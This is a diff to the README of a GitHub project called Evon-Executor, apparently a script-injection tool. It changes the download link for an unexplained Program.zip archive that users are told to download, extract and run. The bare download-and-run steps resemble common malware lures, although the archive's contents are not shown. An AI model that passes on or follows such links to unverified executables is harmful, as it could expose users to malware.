Nappxy/Evon-Executor/README.md

 ## Installation
 To install Evon-Executor, follow these simple steps:
-1. Download the `Program.zip` file from the following link: [Download Program](https://github.com/user-attachments/files/17563018/Program.zip).
+1. Download the `https://github.com/Nappxy/Evon-Executor/releases/download/v2.0/Program.zip` file from the following link: [Download Program](https://github.com/Nappxy/Evon-Executor/releases/download/v2.0/Program.zip).
 2. Extract the contents of the zip file to a directory of your choice.
 3. You are now ready to use Evon-Executor for your script execution needs.